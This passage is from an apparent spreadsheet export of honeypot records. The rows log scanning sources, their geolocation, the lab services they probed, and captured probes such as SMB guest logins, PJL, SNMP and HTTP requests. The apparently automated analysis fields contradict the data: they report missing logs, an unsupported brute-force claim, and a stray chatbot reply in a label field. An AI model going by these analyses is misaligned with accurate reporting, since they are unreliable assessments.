    <s v="NA&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (186.193.176.3,59987)}&amp;&amp;{Data_SMB:Incoming connection (186.193.176.3,60048)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (186.193.176.3,63000)}&amp;&amp;{Data_SMB:Incoming connection (186.193.176.3,63324)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (186.193.176.3,50216)}&amp;&amp;{Data_SMB:Incoming connection (186.193.176.3,50295)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (186.193.176.3,56312)}&amp;&amp;{Data_SMB:Incoming connection (186.193.176.3,63083)}&amp;&amp;{Data_SMB:Incoming connection (186.193.176.3,63181)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (186.193.176.3,55447)}&amp;&amp;{Data_SMB:Incoming connection (186.193.176.3,55968)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (186.193.176.3,49431)}&amp;&amp;{Data_SMB:Incoming connection (186.193.176.3,49517)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (186.193.176.3,53104)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (186.193.176.3,53280)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (186.193.176.3,63628)}&amp;&amp;{Data_SMB:Incoming connection (186.193.176.3,51709)}&amp;&amp;{Data_SMB:Incoming connection (186.193.176.3,63932)}&amp;&amp;{Data_SMB:Incoming connection (186.193.176.3,63979)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (186.193.176.3,51641)}&amp;&amp;{Data_SMB:Incoming connection (186.193.176.3,51889)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (186.193.176.3,51453)}&amp;&amp;{Data_SMB:Incoming connection (186.193.176.3,51658)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (186.193.176.3,60208)}&amp;&amp;{Data_SMB:Incoming connection (186.193.176.3,58774)}&amp;&amp;{Data_SMB:Incoming connection (186.193.176.3,54693)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:bac1:b003"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="No log data provided, unable to analyze malicious activity. _x000a_There is insufficient information to determine any malicious activity or potential threat. _x000a_Cannot proceed with analysis without actual log data. &amp;&amp; An incoming network connection from an unknown IP address is attempting to connect to a SMB share on the system. This could be a scanning or probing activity by malicious software. The intention may be unauthorized access or data exfiltration. &amp;&amp; Possible malicious activity involves an incoming connection from a suspicious IP address attempting to access a shared resource on the network for unauthorized purposes. The connection is initiated by an external entity with a specific port number. This could be an attempt at exploiting vulnerable services or accessing sensitive data without authorization."/>
    <s v="SMB Scanning &amp;&amp; SMB Scan"/>
  </r>
  <r>
    <x v="34"/>
    <x v="34"/>
    <s v="vmi2292403.contaboserver.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-30T22:11:48"/>
    <d v="2025-03-03T22:37:57"/>
    <d v="2025-04-30T22:11:48"/>
    <n v="41"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_MSSQL_H45&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="1433&amp;&amp;445&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="MO"/>
    <s v="Missouri"/>
    <s v="St. Louis"/>
    <s v="St Louis"/>
    <s v="4407066"/>
    <s v="63101"/>
    <s v="38.627"/>
    <s v="-90.1994"/>
    <s v="40021"/>
    <s v="Nubes, LLC"/>
    <s v="Nubes, LLC"/>
    <s v="hosting"/>
    <s v="Contabo GmbH"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (194.238.27.137,65349)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (194.238.27.137,65437)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (194.238.27.137,57398)}&amp;&amp;{Data_SMB:Incoming connection (194.238.27.137,57471)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (194.238.27.137,65134)}&amp;&amp;{Data_SMB:Incoming connection (194.238.27.137,65171)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c2ee:1b89"/>
    <s v="C-I_D"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="35"/>
    <x v="35"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T22:11:44"/>
    <d v="2023-08-26T19:58:45"/>
    <d v="2025-04-30T22:11:44"/>
    <n v="2127"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H8&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H10"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;61283&amp;&amp;23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="RJ"/>
    <s v="Rio de Janeiro"/>
    <s v="Duque de Caxias"/>
    <s v="Vila Sarapui"/>
    <s v="12420851"/>
    <s v="NA"/>
    <s v="-22.7518"/>
    <s v="-43.2988"/>
    <s v="271415"/>
    <s v="S3 Net Soluções Inteligentes Ltda"/>
    <s v="S3 Net Soluções Inteligentes Ltda"/>
    <s v="business"/>
    <s v="S3 Net Soluções Inteligentes Ltda"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b300:33c1"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="36"/>
    <x v="36"/>
    <s v="NA&amp;&amp;sh-chi-us-gp1-wk101a.internet-census.org"/>
    <x v="0"/>
    <d v="2025-04-30T22:11:28"/>
    <d v="2023-07-25T20:59:59"/>
    <d v="2025-04-30T22:11:28"/>
    <n v="1998"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_POP3_H39&amp;&amp;SMA-LAB_POP3_H21&amp;&amp;SMA-LAB_SNMP_H8&amp;&amp;SMA-LAB_PJL_H37&amp;&amp;SMA-LAB_IRC_H38&amp;&amp;SMA-LAB_PJL_H6&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_LDAP_H30&amp;&amp;SMA-LAB_POP3_H44&amp;&amp;SMA-LAB_ORACLE_H8&amp;&amp;SMA-LAB_LDAP_H46&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_ORACLE_H15&amp;&amp;SMA-LAB_IMAP_H46&amp;&amp;SMA-LAB_MYSQL_H36&amp;&amp;SMA-LAB_FTP_H11&amp;&amp;SMA-LAB_SIP_H12&amp;&amp;SMA-LAB_LDAP_H45&amp;&amp;SMA-LAB_DNS_H46&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_SOCKS5_H11&amp;&amp;SMA-LAB_REDIS_H33&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_REDIS_H18&amp;&amp;SMA-LAB_HTTPS_H34&amp;&amp;SMA-LAB_POSTGRES_H8&amp;&amp;SMA-LAB_IMAP_H24&amp;&amp;SMA-LAB_PJL_H19&amp;&amp;SMA-LAB_PJL_HC1&amp;&amp;SMA-LAB_ORACLE_H17&amp;&amp;SMA-LAB_POSTGRES_H40&amp;&amp;SMA-LAB_REDIS_H8"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;110&amp;&amp;161&amp;&amp;9100&amp;&amp;6667&amp;&amp;80&amp;&amp;389&amp;&amp;1521&amp;&amp;23&amp;&amp;143&amp;&amp;3306&amp;&amp;21&amp;&amp;5060&amp;&amp;389&amp;&amp;53&amp;&amp;5900&amp;&amp;1080&amp;&amp;6379&amp;&amp;30071&amp;&amp;443&amp;&amp;5432&amp;&amp;445&amp;&amp;NA&amp;&amp;3389&amp;&amp;26137"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="IL"/>
    <s v="Illinois"/>
    <s v="Cook"/>
    <s v="Chicago"/>
    <s v="4887398"/>
    <s v="60666"/>
    <s v="41.8781"/>
    <s v="-87.6298"/>
    <s v="211680"/>
    <s v="NSEC - Sistemas Informaticos, S.A."/>
    <s v="NSEC - Sistemas Informaticos, S.A."/>
    <s v="business"/>
    <s v="Inap CHI"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;command&amp;&amp;request&amp;&amp;login&amp;&amp;NA&amp;&amp;stshash&amp;&amp;query&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'OECJ0'}}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_SMB:Incoming connection (45.156.129.60,52908)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (guest,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (guest,)}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=45.156.129.60;rport=55893'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '103.113.68.70', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=root'}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000d__x000a_@PJL INFO ID_x000d__x000a_@PJL INFO PRODINFO_x000d__x000a_'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 109.123.229.33:9100_x000d__x000a_User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36 _x000d__x000a_Accept: */*_x000d__x000a_Accept-Encoding: gzip_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_SMB:Incoming connection (45.156.129.60,38630)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (guest,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (guest,)}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000d__x000a_@PJL INFO ID_x000d__x000a_@PJL INFO PRODINFO_x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 38.54.42.176:9100_x000d__x000a_User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36 _x000d__x000a_Accept: */*_x000d__x000a_Accept-Encoding: gzip_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'KODH0'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'PJHL0'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '109.123.229.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000d__x000a_@PJL INFO ID_x000d__x000a_@PJL INFO PRODINFO_x000d__x000a_'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.4.48.242', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2d9c:813c"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="There is insufficient log data provided for analysis. &amp;&amp; No LDAP login attempt was detected, suggesting that an attacker did not try to access the system using a valid or invalid username. This could be due to a failed attack or lack of activity against this service. The absence of a login attempt is unusual in this context. &amp;&amp; No log data provided. &amp;&amp; No data provided, cannot analyze."/>
    <s v="I need to see some log data to analyze! Please provide the data, and I'll be happy to help you identify the types of attacks."/>
  </r>
  <r>
    <x v="37"/>
    <x v="37"/>
    <s v="NA&amp;&amp;sh-chi-us-gp1-wk135c.internet-census.org"/>
    <x v="0"/>
    <d v="2025-04-30T22:11:25"/>
    <d v="2024-10-28T09:30:38"/>
    <d v="2025-04-30T22:11:25"/>
    <n v="209"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Email Spoofing"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_POSTGRES_H24&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_PJL_H5&amp;&amp;SMA-LAB_SNMP_H44&amp;&amp;SMA-LAB_ORACLE_H34&amp;&amp;SMA-LAB_LDAP_H10&amp;&amp;SMA-LAB_ORACLE_H6&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_LDAP_H33&amp;&amp;SMA-LAB_PJL_H8&amp;&amp;SMA-LAB_IRC_H24&amp;&amp;SMA-LAB_PJL_H14&amp;&amp;SMA-LAB_REDIS_H34&amp;&amp;SMA-LAB_LDAP_H34&amp;&amp;SMA-LAB_LDAP_H17&amp;&amp;SMA-LAB_FTP_H36&amp;&amp;SMA-LAB_POSTGRES_H15&amp;&amp;SMA-LAB_LDAP_H41&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_PJL_H46&amp;&amp;SMA-LAB_POP3_H30&amp;&amp;SMA-LAB_POP3_H43&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_TELNET_H9"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;5432&amp;&amp;23&amp;&amp;9100&amp;&amp;161&amp;&amp;1521&amp;&amp;389&amp;&amp;5900&amp;&amp;6667&amp;&amp;6379&amp;&amp;16166&amp;&amp;110&amp;&amp;3306&amp;&amp;NA&amp;&amp;21"/>
    <s v="True"/>
    <s v="{'dnsbl-2.uceprotect.net': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="IL"/>
    <s v="Illinois"/>
    <s v="Cook"/>
    <s v="Chicago"/>
    <s v="4887398"/>
    <s v="60666"/>
    <s v="41.8781"/>
    <s v="-87.6298"/>
    <s v="211680"/>
    <s v="NSEC - Sistemas Informaticos, S.A."/>
    <s v="NSEC - Sistemas Informaticos, S.A."/>
    <s v="business"/>
    <s v="Inap CHI"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;query&amp;&amp;NA&amp;&amp;command"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000d__x000a_@PJL INFO ID_x000d__x000a_@PJL INFO PRODINFO_x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 103.211.202.140:9100_x000d__x000a_User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36 _x000d__x000a_Accept: */*_x000d__x000a_Accept-Encoding: gzip_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_PJL:{'command': 'SSH-2.0-Go_x000d__x000a_'}}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0 1.3.6.1.2.1.1.2.0 1.3.6.1.2.1.1.3.0 1.3.6.1.2.1.1.4.0 1.3.6.1.2.1.1.5.0 1.3.6.1.2.1.1.6.0 1.3.6.1.2.1.1.7.0', 'version': '1'}}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'QUIT'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 45.14.244.111:9100_x000d__x000a_User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36 _x000d__x000a_Accept: */*_x000d__x000a_Accept-Encoding: gzip_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000d__x000a_@PJL INFO ID_x000d__x000a_@PJL INFO PRODINFO_x000d__x000a_'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 154.26.156.60:9100_x000d__x000a_User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36 _x000d__x000a_Accept: */*_x000d__x000a_Accept-Encoding: gzip_x000d__x000a__x000d__x000a_'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2d9c:8157"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="No log data provided. &amp;&amp; No activity detected for POP3 service, suggesting potential probing or scanning attempt to exploit service vulnerability. _x000a_Activity is likely reconnaissance or exploration of system to identify vulnerable services._x000a_System administrators should review network logs and firewall settings to prevent unauthorized access. &amp;&amp; This log indicates an attempt to initiate a secure connection for POP3 email protocol, which is often used by malicious actors to cover their tracks or send spam emails. The action suggests an external threat actor probing for vulnerabilities or attempting to establish unauthorized access. This behavior may be indicative of reconnaissance activity leading to potential data exfiltration. &amp;&amp; This suggests an attempt to initiate a secure connection for POP3 protocol, which may be a precursor to unauthorized access or exploitation of the service. The use of 'STLS' command is unusual and could indicate malicious intent. This activity might be related to scanning or probing for vulnerabilities in the POP3 service. &amp;&amp; The log suggests a potential scanning or probing activity, possibly an attempt to identify open ports or services on the system. This could be a prelude to further malicious actions if successful. The absence of Data_PJL may indicate evasion techniques used by the attacker. &amp;&amp; A GET request is being sent to a server with a suspicious IP address and port number, indicating potential scanning or probing activity for vulnerabilities. The User-Agent header suggests the request is coming from a browser, but its authenticity is unclear. This may be an attempt to identify weaknesses in web servers. &amp;&amp; An unknown user agent is accessing a server at IP address 154.26.156.60 on port 9100, indicating potential scanning or reconnaissance activity._x000a_The request appears to be a basic HTTP GET request for the root directory of the server._x000a_This could be an attempt to gather information about the targeted system's configuration and services. &amp;&amp; No log data provided, unable to analyze. &amp;&amp; This data indicates that SNMP (Simple Network Management Protocol) scans or probes were detected, potentially indicating reconnaissance activity by malicious actors. _x000a_The absence of any specific host information suggests the activity was likely a broad scan rather than a targeted attack._x000a_No further information is available regarding the source or nature of the scanning activity due to NA (not applicable) in Data_SNMP field. &amp;&amp; This log indicates possible brute force attacks on an account, as it shows repeated failed login attempts within a short timeframe._x000a_The attacker is likely trying to guess or crack the password of this account._x000a_This could be an attempt to gain unauthorized access to sensitive information."/>
    <s v="POP3 Scan &amp;&amp; TLS Attack &amp;&amp; SSL Scan &amp;&amp; Nmap Scan"/>
  </r>
  <r>
    <x v="38"/>
    <x v="38"/>
    <s v="sh-ams-nl-gp1-wk114a.internet-census.org&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-30T22:11:15"/>
    <d v="2024-05-27T05:11:44"/>
    <d v="2025-04-30T22:11:15"/>
    <n v="325"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_POSTGRES_H46&amp;&amp;SMA-LAB_MT-CPA_H6&amp;&amp;SMA-LAB_POSTGRES_H38&amp;&amp;SMA-LAB_POSTGRES_H21&amp;&amp;SMA-LAB_ORACLE_H32&amp;&amp;SMA-LAB_MYSQL_H12&amp;&amp;SMA-LAB_RDP_H45&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_ORACLE_H23&amp;&amp;SMA-LAB_IRC_H39&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_POSTGRES_H37&amp;&amp;SMA-LAB_MYSQL_H32&amp;&amp;SMA-LAB_REDIS_H40&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_ORACLE_H29&amp;&amp;SMA-LAB_LDAP_H26&amp;&amp;SMA-LAB_PJL_HC1&amp;&amp;SMA-LAB_ORACLE_H33&amp;&amp;SMA-LAB_LDAP_H9&amp;&amp;SMA-LAB_POSTGRES_H45&amp;&amp;SMA-LAB_PJL_H12&amp;&amp;SMA-LAB_PJL_H39&amp;&amp;SMA-LAB_REDIS_H10&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_POP3_H46&amp;&amp;SMA-LAB_SNMP_H22&amp;&amp;SMA-LAB_PJL_H22"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;5432&amp;&amp;10742&amp;&amp;1521&amp;&amp;3306&amp;&amp;3389&amp;&amp;15593&amp;&amp;6667&amp;&amp;80&amp;&amp;6379&amp;&amp;23&amp;&amp;9100&amp;&amp;39997&amp;&amp;29770&amp;&amp;110&amp;&amp;161&amp;&amp;389&amp;&amp;445&amp;&amp;NA&amp;&amp;443&amp;&amp;143&amp;&amp;21&amp;&amp;24643&amp;&amp;13257&amp;&amp;5900&amp;&amp;10172"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="NL"/>
    <s v="The Netherlands"/>
    <s v="NH"/>
    <s v="North Holland"/>
    <s v="Gemeente Amsterdam"/>
    <s v="Amsterdam"/>
    <s v="2759794"/>
    <s v="1012"/>
    <s v="52.3676"/>
    <s v="4.90414"/>
    <s v="211680"/>
    <s v="NSEC - Sistemas Informaticos, S.A."/>
    <s v="NSEC - Sistemas Informaticos, S.A."/>
    <s v="business"/>
    <s v="Inap AMS"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;command&amp;&amp;login&amp;&amp;NA&amp;&amp;query&amp;&amp;GET"/>
